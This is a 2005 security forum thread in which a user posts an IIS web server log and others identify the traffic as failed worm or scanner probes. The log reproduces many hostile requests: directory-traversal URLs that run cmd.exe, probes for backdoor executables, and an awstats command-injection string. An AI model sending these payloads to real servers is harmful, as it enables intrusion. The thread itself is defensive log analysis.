OMG Is this a logfile of me being hacked on IIS
Page 1 of 3 123 LastLast
Results 1 to 10 of 24

Thread: OMG Is this a logfile of me being hacked on IIS

  1. #1
    Senior Member treanglin's Avatar
    Join Date
    Dec 2003
    Posts
    110

    OMG Is this a logfile of me being hacked on IIS

    #Software: Microsoft Internet Information Services 6.0
    #Version: 1.0
    #Date: 2005-03-05 03:01:32
    #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
    2005-03-05 03:01:32 192.168.1.108 POST /_vti_bin/_vti_aut/fp30reg.dll - 80 - 66.67.184.150 - 500 0 126
    #Software: Microsoft Internet Information Services 6.0
    #Version: 1.0
    #Date: 2005-03-05 05:02:22
    #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
    2005-03-05 05:02:22 192.168.1.108 POST /_vti_bin/_vti_aut/fp30reg.dll - 80 - 66.67.235.161 - 500 0 126
    #Software: Microsoft Internet Information Services 6.0
    #Version: 1.0
    #Date: 2005-03-05 10:56:17
    #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
    2005-03-05 10:56:17 192.168.1.108 HEAD /iisstart.htm - 80 - 68.36.205.30 - 200 0 0
    2005-03-05 11:08:09 192.168.1.108 GET /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:09 192.168.1.108 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:10 192.168.1.108 GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:11 192.168.1.108 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 500 0 87
    2005-03-05 11:08:11 192.168.1.108 GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 500 0 87
    2005-03-05 11:08:12 192.168.1.108 GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:12 192.168.1.108 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:15 192.168.1.108 GET /_vti_bin/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:15 192.168.1.108 GET /c/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:17 192.168.1.108 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:18 192.168.1.108 GET /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:18 192.168.1.108 GET /adsamples/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:18 192.168.1.108 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:18 192.168.1.108 GET /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:20 192.168.1.108 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:20 192.168.1.108 GET /msadc/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:20 192.168.1.108 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:20 192.168.1.108 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:20 192.168.1.108 GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 500 0 64
    2005-03-05 11:08:21 192.168.1.108 GET /msadc/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:21 192.168.1.108 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:21 192.168.1.108 GET /_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:22 192.168.1.108 GET /_vti_cnf/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:22 192.168.1.108 GET /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:22 192.168.1.108 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:23 192.168.1.108 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:23 192.168.1.108 GET /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:25 192.168.1.108 GET /scripts..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:25 192.168.1.108 GET /d/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:25 192.168.1.108 GET /cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:25 192.168.1.108 GET /cgi-bin/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:25 192.168.1.108 GET /msadc/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:25 192.168.1.108 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:25 192.168.1.108 GET /scripts/..%5c%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:25 192.168.1.108 GET /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:26 192.168.1.108 GET /samples/............/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:27 192.168.1.108 GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:27 192.168.1.108 GET /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:27 192.168.1.108 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:27 192.168.1.108 GET /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:29 192.168.1.108 GET /scripts/line.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:29 192.168.1.108 GET /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:31 192.168.1.108 GET /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:31 192.168.1.108 GET /scripts/cmd1.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:31 192.168.1.108 GET /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:31 192.168.1.108 GET /scripts/bs.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:31 192.168.1.108 GET /scripts/sensepost.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:32 192.168.1.108 GET /scripts/kimroot.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:32 192.168.1.108 GET /scripts/win32.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:32 192.168.1.108 GET /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:34 192.168.1.108 GET /scripts/eXe.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:34 192.168.1.108 GET /scripts/sys.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:34 192.168.1.108 GET /scripts/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:34 192.168.1.108 GET /scripts/boot.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:34 192.168.1.108 GET /scripts/........winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:35 192.168.1.108 GET /scripts/lol.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:35 192.168.1.108 GET /scripts/exe.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:35 192.168.1.108 GET /scripts/cmd3.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:35 192.168.1.108 GET /scripts/superlol.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:36 192.168.1.108 GET /scripts/a.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:37 192.168.1.108 GET /scripts/monkey.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:37 192.168.1.108 GET /scripts/max-loh.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:37 192.168.1.108 GET /scripts/winelt.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:37 192.168.1.108 GET /scripts/exchange.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:37 192.168.1.108 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:38 192.168.1.108 GET /scripts/rundll.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:38 192.168.1.108 GET /scripts/un.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:38 192.168.1.108 GET /scripts/script.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:38 192.168.1.108 GET /scripts/cmd2.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:38 192.168.1.108 GET /scripts/some.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:38 192.168.1.108 GET /scripts/drone.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:39 192.168.1.108 GET /scripts/serverdata.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:39 192.168.1.108 GET /scripts/****.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:39 192.168.1.108 GET /scripts/Serverdata.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:39 192.168.1.108 GET /scripts/z.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:39 192.168.1.108 GET /scripts/echo.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:39 192.168.1.108 GET /scripts/ccc.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:39 192.168.1.108 GET /scripts/sykon.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:39 192.168.1.108 GET /scripts/root1.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:40 192.168.1.108 GET /scripts/smss.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:40 192.168.1.108 GET /scripts/az.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:40 192.168.1.108 GET /scripts/aagweb.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:43 192.168.1.108 GET /scripts/mkhe.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 3
    2005-03-05 11:08:43 192.168.1.108 GET /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:45 192.168.1.108 GET /msadc/..../..../..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:45 192.168.1.108 GET /scripts/root.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:48 192.168.1.108 GET /scripts/test.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:49 192.168.1.108 GET /scripts/shell.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    2005-03-05 11:08:50 192.168.1.108 GET /msadc/..../winnt/system32/cmd.exe /c+dir+c:\ 80 - 68.36.205.30 Mozilla/?? 404 0 64
    #Software: Microsoft Internet Information Services 6.0
    #Version: 1.0
    #Date: 2005-03-05 23:00:37
    #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
    2005-03-05 23:00:37 192.168.1.108 GET /cgi-bin/awstats/awstats.pl configdir=|%20id%20| 80 - 206.61.118.236 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) 404 0 3
    2005-03-05 23:00:37 192.168.1.108 GET /cgi-bin/awstats.pl configdir=|%20id%20| 80 - 206.61.118.236 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) 404 0 3
    2005-03-05 23:00:37 192.168.1.108 GET /cgi/awstats.pl configdir=|%20id%20| 80 - 206.61.118.236 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) 404 0 3
    "Do you know why the system is slow?" they ask

    "It's probably something to do with..." I look up today's excuse ".. clock speed"
    -BOFH

  2. #2
    Junior Member
    Join Date
    Feb 2005
    Posts
    9
    It certainly is. Most likely just some worm infected machine somewhere attempting to spread itself. Looks like all the requests recieved a 404 file not found error which is fine. Just make sure your machine is patched and IIS is locked down.

  3. #3
    THE Bastard Sys***** dinowuff's Avatar
    Join Date
    Jun 2003
    Location
    Third planet from the Sun
    Posts
    1,250
    I count 5 worms, 2 trojans and one rootkit. Anyone?

    [edit] 2 root kits I just did a quick once over
    09:F9:11:02:9D:74:E3:5B8:41:56:C5:63:56:88:C0

  4. #4
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    Short Answer: Looks like a combination of URL scanner and script kiddies. None were successful.

    Long Answer:

    From your log file, the columns (roughly) are:

    Date Time Server IP CMD/URL PORT - Source IP - User-Agent (read browser) HTTP Return code

    So...the first thing you should probably be concerned with is the HTTP return code. A quick glance reveals they are all 404 or 500. What is this you might ask ?

    A quick check here: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    And 404 means Not Found (as in the file they were after doesn't exist)
    And 500 means Internal Server Error (this could be a little something to worry about).

    Anyway...other interesting things to note...the user agent that shows up are either Mozilla/?? or Mozilla/4.0+(blah blah). Now this to me is interesting because it indicates the first one has a forged user-agent field, which means it could be changed as it is sent out or most likely indicates a scripted attack. The second is interested because that is a valid user-agent and, if not altered/forged (which it still could be), would tend to indicate it was a directed attack by a user.

    The timing on the first (aprox 2-3 s between URLs) would also indicate a scripted attack, so that is where I would lean on that one. The second one is probably just some script kiddie looking for someone who is running awstats and is trying to take advantage of a fairly recent vulnerability that was announced with it.

    Lastly, just noticed the first two (not sure how I missed that). Looks like someone was trying to post using front page but it created a server error. This could be for one of many reasons, but regardless was a failed attempt.
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)

  5. #5
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,883
    Yep, this looks like Nikto at work...

    NIKTO README

    The IP address of the remote host returns this:

    06/03/05 16:24:06 IP block 68.36.205.30
    Trying 68.36.205.30 at ARIN
    Trying 68.36.205 at ARIN
    Comcast Cable Communications, Inc. JUMPSTART-1 (NET-68-32-0-0-1)
    68.32.0.0 - 68.63.255.255
    Comcast Cable Communications, Inc. NJ-NORTH-1 (NET-68-36-0-0-1)
    68.36.0.0 - 68.36.255.255

    # ARIN WHOIS database, last updated 2005-06-02 19:10
    # Enter ? for additional hints on searching ARIN's WHOIS database.

    Neb gave you a ton of good info, this is just the cleanup work. A clown on Comcast Cable is where the scan came from.

    --TH13
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  6. #6
    AO Ancient: Team Leader
    Join Date
    Oct 2002
    Posts
    5,197
    I dunno.... It looks like a perfectly normal daily log file entry on a computer that is secured and patched agianst the exploits tried.....

    Treanglin: You're fine... get used to them.... Learn to look for the returned error code, (403, 404, 500 etc.). If the error code is above 400 then nothing bad happened except, possibly, some information gathering. However, information gathering will not usually come in a burst like this unless you have an impatient attacker that is simply testing to see if you are vulnerable to any of the old stuff. What this would usually tell you about the attacker is that he probably doesn't fully grasp his NMap and other tools output or that he won't be able to go much further in penetrating your system because he doesn't write his own stuff - if he did he wouldn't be doing such an obvious scan which is what this would be if it weren't a worm.
    Don\'t SYN us.... We\'ll SYN you.....
    \"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools.\" - Thucydides

  7. #7
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,883
    LOL. As Tiger said, this guy isn't very slick. The traffic he threw against your box would be the same as a robber ringing the doorbell before he tried to break in.
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  8. #8
    AO Ancient: Team Leader
    Join Date
    Oct 2002
    Posts
    5,197
    FSCK, FSCK, FSCK....

    Note to Self: Fix Doorbell......

    Don\'t SYN us.... We\'ll SYN you.....
    \"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools.\" - Thucydides

  9. #9
    Senior Member RoadClosed's Avatar
    Join Date
    Jun 2003
    Posts
    3,834
    Ring Ring, not to mention most new firewalls would have slipped the dead bolt while he was peeking in the front window.
    West of House
    You are standing in an open field west of a white house, with a boarded front door.
    There is a small mailbox here.

  10. #10
    AO BOFH: Luser Abuser BModeratorFH gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    Originally posted here by thehorse13
    LOL. As Tiger said, this guy isn't very slick. The traffic he threw against your box would be the same as a robber ringing the doorbell before he tried to break in.
    No respect for common courtesy anymore. If you don't ring the door bell, there is a chance someone is inside. I would ring the door bell, that way if someone answered you act like a salesman and move on.
    Kill the lights, let the candles burn behind the pumpkinsí mischievous grins, and let the skeletons dance. For one thing is certain, The Misfits have returned and once again everyday is Halloween.The Misfits FreeBSD
    Cannibal Holocaust
    SuSE Linux
    Slackware Linux

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

 Security News

     Patches

       Security Trends

         How-To

           Buying Guides